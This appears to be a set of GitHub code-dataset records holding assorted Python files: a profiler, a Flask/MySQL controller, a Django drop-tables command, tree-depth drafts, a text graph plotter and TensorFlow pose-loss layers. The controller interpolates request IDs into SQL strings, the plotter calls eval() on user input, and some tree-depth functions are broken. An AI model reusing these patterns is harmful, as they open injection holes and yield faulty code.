fig.add_subplot(111)\r\nax.plot(Xtpath[:n,2],-Xtpath[:n,0],'k',label='True')\r\nax.plot(Xgicp[:n,0],Xgicp[:n,1],'r',label='gicp')\r\n# ax.plot(Xgmm[:n,0],Xgmm[:n,1],'b',label='gmm')\r\nax.legend()\r\nax.set_title(\"main-all\")\r\n","repo_name":"nadurthi/ResearchCodes","sub_path":"main_kitti_compare_odometry.py","file_name":"main_kitti_compare_odometry.py","file_ext":"py","file_size_in_byte":19080,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"71696561720","text":"#!/bin/python3\n\nimport math\nimport os\nimport random\nimport re\nimport sys\n\n\n#\n# Complete the 'getAutocompleteScores' function below.\n#\n# The function is expected to return an INTEGER_ARRAY.\n# The function accepts following parameters:\n# 1. STRING_ARRAY documentTitles\n# 2. STRING_ARRAY documentBodies\n# 3. 
STRING_ARRAY queries\n#\n\ndef getAutocompleteScores(documentTitles, documentBodies, queries):\n    # Write your code here\n    '''\n    have to find the highest score it can autocomplete to\n    step 1: figure out what it can complete to\n    step 2: figure out the scores of each\n    step 3: return the highest score\n    '''\n    # our return array \n    scores = []\n\n    # read all words into a dictionary with key = word, value = [n,m]\n    # n = title occurrences, m = body occurrences \n    words = createWordDictionary(documentTitles, documentBodies)\n\n    # now that we have occurrences, get scores for every word we've seen\n    wordScores = assignScores(words)\n\n\n    # calculate scores for every query\n    for query in queries:\n        possibleWords = findPossibleWords(query, wordScores)\n        highestScore = 0 # if no possible words, will still add 0 to scores array\n        for word in possibleWords:\n            tempScore = wordScores[word]\n            if tempScore > highestScore:\n                highestScore = tempScore\n        scores.append(highestScore)\n    return scores\n\ndef findPossibleWords(start, words):\n    # given the start of the word, find out\n    # what it can complete to\n    possibleWords = []\n\n    # go through every word and see if can complete \n    for word in words.keys():\n        if canComplete(start, word):\n            possibleWords.append(word)\n\n    return possibleWords\n\n\n\ndef createWordDictionary(documentTitles, documentBodies):\n    # given a word, get the total score across the input\n    # returns zero if word not in the documents \n    words = {}\n    for title in documentTitles:\n        titleWords = title.split()\n        for word in titleWords:\n            if word not in words:\n                words[word] = [1, 0]\n            else:\n                words[word][0] += 1\n\n    for body in documentBodies:\n        bodyWords = body.split()\n        for word in bodyWords:\n            if word not in words:\n                words[word] = [0, 1]\n            else:\n                words[word][1] += 1\n    \n    return words\n\ndef assignScores(words):\n    wordsScores = {}\n    for key, value in words.items():\n        score = int(value[0]*10 + value[1]*1)\n        wordsScores[key] = score\n\n    return wordsScores\n\ndef canComplete(target, word):\n    if target > word:\n        return False\n\n    for i in range(len(target)):\n        if target[i] != word[i]:\n            return False\n    \n    # if we've made it this far, every char in target \n    # was in word so it can complete \n    return True\n    \n\n\n\n    \n\nif __name__ == '__main__':\n    fptr = open(os.environ['OUTPUT_PATH'], 'w')\n\n    documentTitles_count = int(input().strip())\n\n    documentTitles = []\n\n    for _ in range(documentTitles_count):\n        documentTitles_item = input()\n        documentTitles.append(documentTitles_item)\n\n    documentBodies_count = int(input().strip())\n\n    documentBodies = []\n\n    for _ in range(documentBodies_count):\n        documentBodies_item = input()\n        documentBodies.append(documentBodies_item)\n\n    queries_count = int(input().strip())\n\n    queries = []\n\n    for _ in range(queries_count):\n        queries_item = input()\n        queries.append(queries_item)\n\n    result = getAutocompleteScores(documentTitles, documentBodies, queries)\n\n    fptr.write('\\n'.join(map(str, result)))\n    fptr.write('\\n')\n\n    fptr.close()\n","repo_name":"tofuadmiral/leetcodermans","sub_path":"coin_change.py","file_name":"coin_change.py","file_ext":"py","file_size_in_byte":3648,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"}
{"seq_id":"38540443387","text":"from __future__ import print_function\nimport threading\nfrom time import sleep\nimport traceback\nfrom sys import _current_frames\n\n\nclass Sampler:\n    def __init__(self, tid) -> None:\n        self.tid = tid\n        self.t = threading.Thread(target=self.sample, args=())\n        self.active 
= True\n        self.final_tree = [] # [function_name, seg, pos, parents] \n        \n        \n    def start(self):\n        self.active = True\n        self.t.start()\n\n        \n    def stop(self):\n        self.active = False\n        \n    def checkTrace(self):\n        for thread_id, frames in _current_frames().items():\n            if thread_id == self.tid:\n                frames = traceback.walk_stack(frames)\n                stack = []\n                for frame, _ in frames: \n                    code = frame.f_code.co_name\n                    stack.append(code)\n                stack.reverse()\n                #print(stack) # This line prints the stack after reversing it; you can comment or uncomment it as you wish\n                \n                # add the new nodes\n                for pos in range(len(stack)):\n                    self.usado = False\n                    for fun in self.final_tree: \n                        if stack[pos] == fun[0] and pos == fun[2] and fun[3] == stack[0:pos] :\n                            self.usado = True\n                            fun[1] += 1\n                            break\n                    if self.usado == False:\n                        self.final_tree.append([stack[pos], 1, pos, stack[0:pos]])\n\n                # Deactivate functions: HERE is what needs modifying (check whether to add 1 to pos_tree to make room)\n        \n        \n    def sample(self):\n        while self.active:\n            self.checkTrace()\n            sleep(1)\n\n    def printReport(self):\n        print(f\"total ({self.final_tree[0][1]} seconds)\")\n        for i in self.final_tree:\n            print(\" \"*i[2], i[0], f\"({i[1]} seconds)\")\n","repo_name":"JuanIke/Testing","sub_path":"Tarea 2/sampler/sampler.py","file_name":"sampler.py","file_ext":"py","file_size_in_byte":1958,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"}
{"seq_id":"74227686519","text":"import codecs\nimport os\nimport re\n\nfrom setuptools import setup, find_packages\n\n\nHERE = os.path.abspath(os.path.dirname(__file__))\n\n\ndef read(*parts):  # Stolen from txacme\n    with codecs.open(os.path.join(HERE, *parts), 'rb', 'utf-8') as f:\n        return f.read()\n\n\ndef get_version(package):\n    \"\"\"\n    Return package version as listed in `__version__` in `init.py`.\n    \"\"\"\n    init_py = open(os.path.join(package, '__init__.py')).read()\n    return re.search(\"__version__ = ['\\\"]([^'\\\"]+)['\\\"]\", init_py).group(1)\n\n\nversion = get_version('gates_subscription_mapper')\n\n\nsetup(\n    name='gates-subscription-mapper',\n    version=version,\n    url='https://github.com/praekeltfoundation/gates-subscription-mapper',\n    license='BSD',\n    description='Gates Subscription Mapper',\n    long_description=read('README.rst'),\n    author='Praekelt.org',\n    author_email='dev@praekelt.org',\n    packages=find_packages(),\n    include_all_package_data=True,\n    install_requires=[\n        'Django==1.11.4',\n        'dj-database-url==0.4.2',\n        'raven==6.1.0',\n        'psycopg2==2.7.3',\n        'seed-services-client==0.26.0',\n        'celery==4.1.0',\n        'djangorestframework==3.6.4',\n        'rapidpro-python==2.1.8',\n        'django-widget-tweaks==1.4.1',\n    ],\n    classifiers=[\n        'Development Status :: 4 - Beta',\n        'Framework :: Django',\n        'License :: OSI Approved :: BSD License',\n        'Programming Language :: Python',\n        'Programming Language :: Python :: 2.7',\n        'Programming Language :: Python :: 3.4',\n        'Programming Language :: Python :: 3.5',\n        'Topic :: Software Development :: Libraries :: Python Modules',\n    ],\n)\n","repo_name":"praekeltfoundation/gates-subscription-mapper","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1677,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"}
{"seq_id":"11210204706","text":"\"\"\" Modules for Controlling Data Flow\n    Use this controller only when using Mappy Type Format\n\"\"\"\n\nfrom Mappy.mysql import MysqlController, SQLBuilder\nfrom flask import abort\n\nclass Controller():\n    \"\"\" Class of controller\n        
All data flow is recommended using Mappy Format\n    \"\"\"\n\n    def __init__(self, database_name, primary_key):\n        self.internal_data = None\n        self.database_name = database_name\n        self.primary_key = primary_key\n\n    def set(self, setter):\n        self.internal_data = setter\n\n    def get(self, data_id = False):\n        \"\"\" Function for getting data from MySQL Database\n            Output\n            @route url/ when you do not provide an id, it will fetch all the data\n            @route url/<data_id>/ when id provided, it will fetch specific data\n        \"\"\"\n        sql_builder = SQLBuilder()\n\n        if not data_id:\n            sql_builder.select(\"*\", self.database_name)\n            self.internal_data = self.query(sql_builder.build()).data()\n            return self\n\n        sql_builder.select(\"*\", self.database_name).where(f\"`{self.primary_key}` = '{data_id}'\")\n        self.internal_data = self.query(sql_builder.build()).data()\n        self.internal_data = self.internal_data[0] if len(self.internal_data) > 0 else {}\n        return self\n\n    def query_get(self, data_id = False):\n        \"\"\" Function for getting data from MySQL Database\n            Output\n            @route url/ when you do not provide an id, it will fetch all the data\n            @route url/<data_id>/ when id provided, it will fetch specific data\n        \"\"\"\n        sql_builder = SQLBuilder()\n\n        if not data_id:\n            sql_builder.select(\"*\", self.database_name)\n            self.internal_data = self.query(sql_builder.build()).data()\n            return self\n\n        sql_builder.select(\"*\", self.database_name).where(f\"`{self.primary_key}` = '{data_id}'\")\n        self.internal_data = self.query(sql_builder.build()).data()\n        self.internal_data = self.internal_data[0] if len(self.internal_data) > 0 else {}\n        return self\n\n    def empty(self):\n        \"\"\" Function to empty the internal data\n            Output\n            Empty Data\n        \"\"\"\n        self.internal_data = {}\n        return self\n\n    def data(self):\n        \"\"\" Function for getting internal data directly without __dict__ \"\"\"\n        return self.internal_data\n\n    def query(self, sql):\n        \"\"\" Function for manipulating data with special cases like create and update\n            Input\n            SQL Commands\n        \"\"\"\n        mysql_controller = MysqlController().set_sql(sql)\n        self.internal_data = mysql_controller.execute()\n        return self\n\n    def is_data_exists(self):\n        \"\"\" Validate if data exists or not\"\"\"\n        return bool(self.internal_data)\n\n    @classmethod\n    def trigger_error(cls, error_code):\n        \"\"\" Function to trigger if an error happened \"\"\"\n        codes_dictionary = {\n            \"DATA_NOT_EXISTS\" : {\n                \"msg\" : \"JSON data does not exist! 
Please make a get() request first\",\n \"code\" : \"DATA_NOT_EXISTS\",\n \"success\" : False\n },\n \"INVALID_DATA_TYPE\" : {\n \"msg\" : \"Form data should be object of JSON for mappy\",\n \"code\" : \"INVALID_DATA_TYPE\",\n \"success\" : False\n }\n }\n abort(500, codes_dictionary[error_code])\n","repo_name":"Cleonart/JAYA_ABADI_API","sub_path":"Mappy/API/controller.py","file_name":"controller.py","file_ext":"py","file_size_in_byte":3469,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"40272098453","text":"from app.public_views.blog import *\nfrom app.methods.blog_manager import BlogManager\n\n\n@app.route(\"/blog\", methods=[\"POST\", \"GET\"])\ndef blog():\n num = request.args.get('num')\n if num:\n num = int(num)\n else:\n num = 1\n\n blog_manager = BlogManager()\n len_posts = len(blog_manager.blog)\n if len_posts % 3 == 0:\n total_page = int(len_posts / 3)\n else:\n total_page = int(len_posts/3) + 1\n\n posts = blog_manager.blog_post_paginate(num=num)\n return render_template(\"blog/blog.html\",\n user=current_user,\n posts=posts,\n title=\"Blog\",\n num=num,\n total_page=total_page)\n","repo_name":"Stink-Po/favorite_cafe","sub_path":"app/public_views/blog/all_blog_posts_view.py","file_name":"all_blog_posts_view.py","file_ext":"py","file_size_in_byte":743,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"25300419325","text":"from django.core.management.base import NoArgsCommand\nfrom django.db import connection\nfrom django.core.management import call_command\n\n\nclass Command(NoArgsCommand):\n help = \"Deletes all tables in the 'default' database.\"\n option_list = NoArgsCommand.option_list + tuple()\n\n def handle_noargs(self, **options):\n cursor = connection.cursor()\n tables = connection.introspection.django_table_names(\n only_existing=True)\n for table in tables:\n command = \"DROP TABLE %s CASCADE;\" % table\n cursor.execute(command)\n self.stderr.write(\"Executed ... 
%s\" % command)\n cursor.execute(\"COMMIT;\")\n self.stderr.write(\"Running syncdbmigrate ...\")\n call_command(\"syncdbmigrate\", **options)\n","repo_name":"dbca-wa/pbs","sub_path":"swingers/management/commands/drop_create_db.py","file_name":"drop_create_db.py","file_ext":"py","file_size_in_byte":769,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"37025384196","text":"# Definition for a binary tree node.\r\nclass TreeNode:\r\n def __init__(self, val=0, left=None, right=None):\r\n self.val = val\r\n self.left = left\r\n self.right = right\r\n\r\n\r\ndef maxDepth(self, root: TreeNode) -> int:\r\n\r\n current = [root]\r\n following = []\r\n count = 1\r\n \r\n for node in current:\r\n if current.left != None:\r\n following.append(current.left)\r\n if current.right !=None:\r\n following.append(current.right) \r\n \r\n if following:\r\n count += 1\r\n current = following\r\n following = []\r\n \r\n # do it again.\r\n \r\n else:\r\n return count\r\n\r\n\r\n\r\n\r\ndef maxDepth2(root):\r\n nodes_list = [root]\r\n count = 0\r\n \r\n if root is None:\r\n return count\r\n\r\n while nodes_list:\r\n\r\n for x in range(len(nodes_list)):\r\n node = nodes_list.pop(0)\r\n\r\n if node.left:\r\n nodes_list.append(node.left)\r\n\r\n if node.right:\r\n nodes_list.append(node.right)\r\n\r\n \r\n count += 1\r\n return count\r\n\r\n\r\ndef maxDepth_recursive(root):\r\n if root is None:\r\n return 0\r\n else:\r\n return 1 + max(maxDepth1(root.left), maxDepth1(root.right))\r\n\r\nRoot = TreeNode(3)\r\nRoot.left = TreeNode(9)\r\nRoot.left.left = None\r\nRoot.left.right = None\r\nRoot.right = TreeNode(20)\r\nRoot.right.left = TreeNode(15)\r\nRoot.right.right = TreeNode(7)\r\nRoot.right.right.right = TreeNode(8)\r\n\r\nprint(maxDepth2(Root))\r\n\r\n# def print_binary_tree(head):\r\n# curr_left = head\r\n# curr_right = head\r\n\r\n# while curr_left != None:\r\n# print(curr.val)\r\n# curr = curr.next\r\n\r\n","repo_name":"Samrany/practice_problems","sub_path":"maximum-depth-of-binary-tree.py","file_name":"maximum-depth-of-binary-tree.py","file_ext":"py","file_size_in_byte":1721,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"9903545210","text":"'''text based graphs\r\nTim Mostert\r\n16/04/14'''\r\n\r\nimport math\r\n\r\ny = 0\r\nx = 0\r\n\r\nfofx = input(\"Enter a function f(x):\\n\")\r\n\r\nfor row in range(10,-11,-1):\r\n for col in range(-10,11,1):\r\n x = col\r\n graph_line = round(eval(fofx))\r\n if not row == 0 and not row == graph_line and col == 0:\r\n print(\"|\",end=\"\")\r\n elif not col == 0 and not row == graph_line and row == 0:\r\n print(\"-\",end=\"\")\r\n elif row == 0 and col == 0 and not row == graph_line:\r\n print(\"+\",end=\"\")\r\n elif row == graph_line:\r\n print(\"o\",end=\"\")\r\n else:\r\n print(\" \",end=\"\")\r\n \r\n \r\n print() \r\n \r\n \r\n ","repo_name":"MrHamdulay/csc3-capstone","sub_path":"examples/data/Assignment_5/vrntim001/question4.py","file_name":"question4.py","file_ext":"py","file_size_in_byte":803,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"69856750840","text":"import random\nfrom game_helper import initialize_board \nfrom game_helper import add_bombs\nfrom game_helper import add_nums\n\nclass GameBoard:\n\n # numRows: integer\n # numCols: integer\n # probability: integer\n # currentState: 2D array\n # solution: 2D array\n\n def __init__(self,numRows, numCols, probabilityOfBomb):\n 
self.numRows = numRows\n        self.numCols = numCols\n        self.probability = probabilityOfBomb\n        self.currentState = initialize_board(self.numRows, self.numCols)\n        soln = initialize_board(self.numRows, self.numCols)\n        add_bombs(soln, self.probability)\n        add_nums(soln)\n        self.solution = soln\n\n    \n\n    def print_current_state(self):\n        for row in self.currentState:\n            for elt in row:\n                print(elt, end=' ')\n            print()\n\n    # returns whether or not the move causes the user to lose\n    # true: move succeeds\n    # false: move fails\n    def make_move(self, move_row, move_col):\n        if self.solution[move_row][move_col] == \"*\":\n            return False\n        else:\n            value = self.solution[move_row][move_col]\n            self.currentState[move_row][move_col] = value\n            return True\n    \n","repo_name":"guyman575/CodeConnectsJacob","sub_path":"semester2/lesson3/game_board.py","file_name":"game_board.py","file_ext":"py","file_size_in_byte":1227,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"}
{"seq_id":"10349307797","text":"import sys\n\ndef input():\n    return sys.stdin.readline().rstrip()\n\n\nN,M,R = map(int,input().split())\narr = [list(map(int,input().split())) for _ in range(N)]\n\n\nvisited = [[True for _ in range(M)] for _ in range(N)]\nresult = [[0 for _ in range(M)] for _ in range(N)]\ndx = [0,1,0,-1]\ndy = [1,0,-1,0]\nrotate = []\nfor k in range(min(N,M)//2):\n    temp = []\n    cx,cy = k,k\n    d = 0\n\n    while visited[cx][cy]:\n        visited[cx][cy] = False\n        temp.append(arr[cx][cy])\n        nx,ny = cx + dx[d], cy + dy[d]\n        if 0<=nx= max_loc:\n            raise ValueError(\"min_loc must be less than max_loc\")\n        self.loc_map_z = heatmap_1d.LocationMap(bins = self.depth_bins, min_loc=min_loc, max_loc=max_loc)\n    \n    \n    def build(self, inputs_shape):\n        print(self.name,inputs_shape)\n        feature_z_shape, gt_loc_z_shape, gt_index_z_shape = inputs_shape\n        self.loss_z = heatmap_1d.VarianceLocationAndPossitionLoss(self.loc_map_z.loc_delta)\n        \n        self.call = tf.function(self.call,input_signature=[(tf.TensorSpec(shape=[None,feature_z_shape[1],feature_z_shape[2],self.depth_bins], dtype=self.dtype),\n                                                            tf.TensorSpec(shape=[None], dtype=self.dtype),\n                                                            tf.TensorSpec(shape=[None,3], dtype=tf.int32))])\n        super().build(inputs_shape)\n\n    # is a @tf.function with defined input shape\n    def call(self, inputs):\n        features_z, gt_loc_z, gt_index_z = inputs\n        \n        features_z = heatmap_1d.feature_to_location_propability_map(features_z)\n        loc_map_z = self.loc_map_z(0.)\n        mask = heatmap_1d.mask_from_index(gt_index_z, tf.shape(features_z)[0:3])\n        prop_map_z = heatmap_1d.mask_propability_map((features_z, mask))\n        gt_loc_exp_z = heatmap_1d.expand_gt(gt_index_z, gt_loc_z, tf.shape(prop_map_z)[0:3])\n        loc_z = heatmap_1d.propability_map_to_location(prop_map_z, loc_map_z)\n        loss_z = self.loss_z(prop_map_z, loc_z, loc_map_z, gt_loc_exp_z)\n        \n        feature_shape = tf.shape(features_z)\n\n        loss_z = tf.concat(loss_z, axis=-1)\n        loss_z = tf.gather_nd(loss_z,gt_index_z)\n        loss_z = tf.reshape(loss_z, [feature_shape[0],-1,2])\n        \n        loc_z_point = tf.gather_nd(loc_z,gt_index_z)\n        loc_z_point = tf.reshape(loc_z_point, [feature_shape[0],-1,1])\n        \n        loc_z_point_shape = tf.shape(loc_z_point)\n        \n        loss_z_sum = tf.reduce_sum(loss_z) + 0.001\n        loss_z_batch = tf.reduce_sum(loss_z, axis=0)\n        loss_z_factor = loss_z_batch*tf.cast(loc_z_point_shape[1], dtype = self.dtype)/loss_z_sum/ self.loc_map_z.max_loc\n        \n        hard_kp_loss_z = loss_z*loss_z_factor\n        return hard_kp_loss_z, loc_z_point\n    \nclass PoseLoss2D(tf.keras.layers.Layer):\n    \n    def __init__(self, xy_bins, min_loc=[-150,-150], 
max_loc=[150, 150], name = \"PoseLoss2D\", **kwargs):\n super().__init__(name = name, **kwargs)\n self.loc_map_xy = heatmap_2d.LocationMap(bins=xy_bins, min_loc=min_loc,max_loc=max_loc, dtype=self.dtype)\n \n \n def build(self, inputs_shape):\n print(self.name,inputs_shape)\n features_xy_shape, gt_xy_shape = inputs_shape\n self.key_points = features_xy_shape[-1]\n \n self.loss_xy = heatmap_2d.VarianceLocationAndPossitionLoss(self.loc_map_xy.loc_delta)\n \n self.call = tf.function(self.call,input_signature=[(tf.TensorSpec(shape=[None,features_xy_shape[1],features_xy_shape[2],self.key_points], dtype=self.dtype),\n tf.TensorSpec(shape=[None,self.key_points,2], dtype=self.dtype))])\n super().build(inputs_shape)\n\n # is a @tf.function with defined input shape\n def call(self, inputs):\n features_xy, gt_xy = inputs\n features_xy = tf.transpose(features_xy, [3,0,1,2])\n gt_xy_per_keypoint = tf.transpose(gt_xy, [1,0,2])\n \n \n keypoint_loss_arr = tf.TensorArray(dtype=self.dtype, size=self.key_points, dynamic_size=False)\n loc_xy_arr = tf.TensorArray(dtype=self.dtype, size=self.key_points, dynamic_size=False)\n \n for kp in tf.range(self.key_points):\n feature_xy = features_xy[kp]\n gt_loc_xy = gt_xy_per_keypoint[kp]\n \n feature_xy = tf.expand_dims(feature_xy,axis=-1)\n feature_xy = heatmap_2d.feature_to_location_propability_map(feature_xy)\n loc_map_xy = self.loc_map_xy([0.,0.])\n loc_xy = heatmap_2d.propability_map_to_location(feature_xy,loc_map_xy)\n loss_xy = self.loss_xy(feature_xy, loc_xy, loc_map_xy, gt_loc_xy)\n keypoint_loss_arr = keypoint_loss_arr.write(kp,loss_xy)\n loc_xy_arr = loc_xy_arr.write(kp,loc_xy)\n loss_xy = keypoint_loss_arr.stack()\n loss_xy = tf.transpose(loss_xy,[2,0,1])\n loc_xy = loc_xy_arr.stack()\n loc_xy = tf.transpose(loc_xy,[1,0,2])\n \n loss_xy_sum = (tf.reduce_sum(loss_xy)+0.001)\n loss_xy_batch = tf.reduce_sum(loss_xy, axis=0)\n loss_xy_factor = loss_xy_batch*tf.cast(self.key_points, dtype = self.dtype)/loss_xy_sum / self.loc_map_xy.max_loc\n \n hard_kp_loss_xy = loss_xy*loss_xy_factor\n \n return hard_kp_loss_xy, loc_xy\n\nclass PoseLoss(tf.keras.layers.Layer):\n \n def __init__(self, key_points = 15, depth_bins = 10, xyz_min=[-150,-150,-150], xyz_max=[150,150,150], name = \"PoseLoss\", **kwargs):\n super().__init__(name = name, **kwargs)\n self.key_points = tf.cast(key_points, dtype = tf.int32)\n self.depth_bins = tf.cast(depth_bins, dtype = self.dtype)\n self.xyz_min = tf.cast(xyz_min, dtype = tf.int32)\n self.xyz_max = tf.cast(xyz_max, dtype = tf.int32)\n \n \n def build(self, inputs_shape):\n print(self.name,inputs_shape)\n feature_shape = inputs_shape[0]\n self.pose_loss_xy = PoseLoss2D(feature_shape[1:3], min_loc = self.xyz_min[:-1], max_loc = self.xyz_max[:-1])\n self.pose_loss_z = PoseLossDepth(self.depth_bins, min_loc = self.xyz_min[-1], max_loc = self.xyz_max[-1])\n \n self.xy_loc_delta = self.pose_loss_xy.loc_map_xy.loc_delta\n self.xy_min_loc = self.pose_loss_xy.loc_map_xy.min_loc\n self.xy_bins = self.pose_loss_xy.loc_map_xy.bins\n \n self.z_loc_delta = self.pose_loss_z.loc_map_z.loc_delta\n self.z_min_loc = self.pose_loss_z.loc_map_z.min_loc\n self.z_bins = self.pose_loss_z.loc_map_z.bins\n \n self.kp_to_gt = KeypointBatchToPoseGT(self.xy_loc_delta, self.xy_min_loc, self.xy_bins,\n self.z_loc_delta, self.z_min_loc, self.z_bins)\n \n self.call = tf.function(self.call,input_signature=[(tf.TensorSpec(shape=[None,feature_shape[1],feature_shape[2],self.key_points+tf.cast(self.depth_bins, dtype = tf.int32)], dtype=self.dtype),\n 
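# second spec: the per-batch ground-truth keypoints, shape (batch, key_points, xyz)\n                                                            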
tf.TensorSpec(shape=[None,self.key_points,3], dtype=self.dtype))])\n super().build(inputs_shape)\n\n # is a @tf.function with defined input shape\n def call(self, inputs):\n feature, gt_kp = inputs\n features_xy = feature[:,:,:,:self.key_points]\n features_z = feature[:,:,:,self.key_points:]\n\n\n gt_xy, gt_loc_z, gt_index_z = self.kp_to_gt(gt_kp)\n \n hard_kp_loss_xy, loc_xy = self.pose_loss_xy([features_xy, gt_xy])\n hard_kp_loss_z, loc_z = self.pose_loss_z([features_z, gt_loc_z, gt_index_z])\n \n loc_xyz = tf.concat([loc_xy,loc_z],axis=-1)\n \n #TODO transform to real space before sym loss\n #limbs = limb_length(loc_xyz)\n #sym_loss = symmetry_loss(limbs)\n \n return hard_kp_loss_xy, hard_kp_loss_z, loc_xyz\n\nclass PersonPosFromPose(tf.keras.layers.Layer):\n def __init__(self, name = \"PersonPosFromPose\", **kwargs):\n super().__init__(name = name, **kwargs)\n \n def build(self, inputs_shape):\n print(self.name,inputs_shape) \n super().build(inputs_shape)\n self.call = tf.function(self.call,input_signature=[(tf.TensorSpec([None, 15, 3],dtype=self.dtype))])\n \n # is a @tf.function with defined input shape\n def call(self, inputs):\n person_poses = inputs\n print(\"tracing\", self.name,person_poses.shape)\n \n person_pos = tf.reduce_mean(person_poses,axis=1)\n \n return person_pos\n \nperson_pos_from_pose = PersonPosFromPose()\n\nclass PersonPosToIndexes(tf.keras.layers.Layer):\n def __init__(self, name = \"PersonPosToIndexes\", **kwargs):\n super().__init__(name = name, **kwargs)\n \n def build(self, inputs_shape):\n print(self.name,inputs_shape)\n super().build(inputs_shape)\n self.call = tf.function(self.call,input_signature=[(tf.TensorSpec([None],dtype=self.dtype),tf.TensorSpec([None, 3],dtype=self.dtype)),tf.TensorSpec([3],dtype=tf.int32),tf.TensorSpec([3],dtype=self.dtype),tf.TensorSpec([3],dtype=self.dtype)])\n \n def call(self, inputs, max_indexes, min_loc_xyz, loc_delta_xyz):\n batch_index, person_pos = inputs\n print(\"tracing\", self.name, batch_index.shape, person_pos.shape)\n print(\"and params\", max_indexes.shape, min_loc_xyz.shape, loc_delta_xyz.shape)\n \n indices = (person_pos - min_loc_xyz) / loc_delta_xyz\n indices = tf.maximum(indices, 0)\n max_index = tf.cast(max_indexes, dtype=self.dtype)\n indices = tf.minimum(indices, max_index)\n batch_index = tf.expand_dims(batch_index,axis=1)\n indices = tf.concat([batch_index,indices],axis=-1)\n indices = tf.cast(indices + 0.5, dtype=tf.int64)\n return indices\n\nperson_pos_to_indexes = PersonPosToIndexes()\n\nclass PersonPosToHeatMap(tf.keras.layers.Layer):\n def __init__(self, name = \"PersonPosToHeatMap\", **kwargs):\n super().__init__(name = name, **kwargs)\n \n def build(self, inputs_shape):\n print(self.name,inputs_shape)\n super().build(inputs_shape)\n \n @tf.function(experimental_autograph_options=tf.autograph.experimental.Feature.ALL, experimental_relax_shapes=True)\n def call(self, inputs, feature_shape, min_loc_xyz, loc_delta_xyz):\n batch_index, person_pos = inputs\n print(\"tracing\", self.name ,batch_index.shape, person_pos.shape)\n print(self.dtype, batch_index.dtype, person_pos.dtype)\n \n max_indexes = feature_shape[1:] - 1\n indices = person_pos_to_indexes([batch_index, person_pos],max_indexes, min_loc_xyz, loc_delta_xyz)\n heat_map = tf.SparseTensor(indices = indices, values = tf.ones(tf.shape(indices)[0], dtype=self.dtype), dense_shape = tf.cast(feature_shape, dtype =tf.int64))\n heat_map = tf.sparse.to_dense(heat_map, validate_indices=False)\n return heat_map\n\nclass 
HeatMapToWeights(tf.keras.layers.Layer):\n    def __init__(self, name = \"HeatMapToWeights\", **kwargs):\n        super().__init__(name = name, **kwargs)\n    \n    def build(self, inputs_shape):\n        print(self.name,inputs_shape)\n        super().build(inputs_shape)\n    \n    @tf.function(experimental_autograph_options=tf.autograph.experimental.Feature.ALL, experimental_relax_shapes=True)\n    def call(self, inputs):\n        heatmap = inputs\n        heatmap_shape = tf.shape(heatmap)\n        ones = tf.ones(heatmap_shape, dtype=self.dtype)\n        \n        heatmap_3d = tf.expand_dims(heatmap,axis=-1)\n        \n        heatmap_3d_cast = tf.cast(heatmap_3d, dtype=tf.float32) #FIX Tf Maxpool does not support Float64\n        dilated_heatmap_3d_cast = tf.nn.max_pool3d(heatmap_3d_cast, ksize=3, strides=1, padding=\"SAME\", name='dilation')\n        dilated_heatmap_3d = tf.cast(dilated_heatmap_3d_cast, dtype=self.dtype)\n        \n        dilated_heatmap = dilated_heatmap_3d[...,0]\n        \n        # balance the weighting so the many empty cells do not drown out the few person cells\n        nr_persons = tf.reduce_sum(heatmap, axis=[1,2,3])\n        nr_non_zeros = nr_persons * 3*3*3\n        nr_positions = tf.cast(tf.reduce_prod(heatmap_shape[1:]),dtype=self.dtype)\n        scale_negative = nr_non_zeros / nr_positions\n        scale_positive = 1 - nr_persons / nr_positions\n        scale_negative = tf.reshape(scale_negative,[-1,1,1,1])\n        scale_positive = tf.reshape(scale_positive,[-1,1,1,1])\n        \n        negative_weights = (ones - dilated_heatmap) * scale_negative\n        positive_weights = heatmap * scale_positive\n        weights = negative_weights + positive_weights\n        return weights\n\nclass PersonLoss(tf.keras.layers.Layer):\n    def __init__(self, name = \"PersonLoss\", **kwargs):\n        super().__init__(name = name, **kwargs)\n    \n    def build(self, inputs_shape):\n        print(self.name,inputs_shape)\n        feature_shape, (batch_index_shape, pos_shape) = inputs_shape\n        \n        self.heat_map_to_weights = HeatMapToWeights(dtype=self.dtype)\n        self.person_pos_to_heat_map = PersonPosToHeatMap(dtype=self.dtype)\n\n        \n        self.call = tf.function(self.call,input_signature=[(tf.TensorSpec(shape=[None,feature_shape[1],feature_shape[2],feature_shape[3]], dtype=self.dtype),\n                                                            (tf.TensorSpec(shape=[None], dtype=self.dtype),\n                                                             tf.TensorSpec(shape=[None,pos_shape[1]], dtype=self.dtype))),\n                                                           tf.TensorSpec(shape=[3], dtype=self.dtype),\n                                                           tf.TensorSpec(shape=[3], dtype=self.dtype)])\n        super().build(inputs_shape)\n    \n    \n    # is a @tf.function with defined input shape\n    def call(self, inputs, min_loc_xyz, loc_delta_xyz):\n        feature, (batch_index, person_pos) = inputs\n        feature_shape = tf.shape(feature)\n        heat_map = self.person_pos_to_heat_map((batch_index, person_pos), feature_shape, min_loc_xyz, loc_delta_xyz)\n        loss_weights = self.heat_map_to_weights(heat_map)\n        se = (feature - heat_map)**2\n        weighted_loss = se * loss_weights\n        nr_persons = tf.reduce_sum(heat_map, axis=[1,2,3])\n        loss = tf.reduce_sum(weighted_loss, axis=[1,2,3]) / nr_persons\n        return loss\n\n# module-level layer instances used by the test functions below\nperson_pos_to_heat_map = PersonPosToHeatMap()\nperson_loss = PersonLoss()\n\ndef main():\n    #tf.config.experimental_run_functions_eagerly(True)\n    test_pose_loss()\n    test_pos_loss()\n    \ndef test_pos_loss():\n    